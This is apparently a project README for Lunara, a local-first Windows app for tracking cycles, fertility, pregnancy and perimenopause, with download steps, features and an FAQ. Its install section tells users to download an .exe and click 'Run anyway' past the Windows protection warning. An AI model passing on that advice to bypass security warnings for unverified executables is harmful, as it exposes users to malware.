🌙 lunara - Private health tracking on your terms

Lunara helps you track your cycle, fertility, and reproductive health. It keeps all your sensitive data on your own computer. You own your health information. No company sees your logs or sells your data. Use it during your period, through pregnancy, or during the transition of perimenopause.

📥 How to download the app

You can get the latest version directly from the project repository. Please follow these steps to find the software:

  1. Visit the Lunara releases page.
  2. Look for the section labeled "Latest."
  3. Click the link that ends in .exe for Windows.
  4. Save the file to your computer.

⚙️ Running the software

After you download the file, your computer might show a warning. This happens because the developer is an independent contributor.

  1. Double-click the file you saved.
  2. If Windows protects your PC, click "More info."
  3. Click "Run anyway."
  4. Follow the prompts on your screen to install the app.
  5. Open the app from your desktop shortcut or start menu.

📱 What you can track

The app organizes your health data into simple categories. You can record your daily status with a few clicks.

  • Cycle Tracking: Log your period dates to predict your next cycle.
  • Fertility: Monitor your body temperature or physical signs to understand your fertility windows.
  • Pregnancy: Track your progress and major milestones.
  • Perimenopause: Note changes in your body and mood during this life stage.
  • Health Notes: Keep journals of your symptoms or questions for your doctor.

🔒 Why local-first matters

Most health apps store your data on their servers. They may share your records with advertisers or other companies. Lunara works differently.

  • Data Ownership: You hold the file on your own hard drive. Nobody else gains access to your entries.
  • Offline Access: You do not need the internet to use the app. Your data remains available even without a connection.
  • Privacy: Your health history stays in your home. We do not track your clicks or your habits.
  • Security: You control your backups. Move your data to an external drive or cloud storage if you wish.

🛠️ System requirements

This application runs on standard Windows computers. You need:

  • Windows 10 or 11.
  • At least 200 MB of free storage space.
  • A standard monitor and keyboard.
  • No special hardware or complicated setups are necessary.

📝 Common questions

Does the app connect to the internet? The app does not send your health data to a server. It only uses the internet if you choose to download updates.

How do I back up my information? The app saves your data in a specific folder on your computer. You can copy this folder to a USB drive or a private cloud folder to keep a backup.

Is my data encrypted? The application uses modern methods to keep your files secure. For extra safety, you can use built-in Windows encryption like BitLocker to protect your drive.

Can I export my data? Yes. You can export your records as a standard file. This lets you move your data to a new computer or share it with your healthcare provider.

What is AGPL-3.0? This is a software license. It protects your freedom, as it ensures the app stays open-source and free for everyone.

🤝 Getting help

If the app does not work as expected, you can look for help in the following places:

  • Check the Issues tab: Go to the GitHub repository and click "Issues." Search for your problem to see if others fixed it.
  • Start a discussion: Use the "Discussions" section of the repository to ask questions.
  • Submit a report: If you find a bug, create a new issue. Describe what you did and what happened.
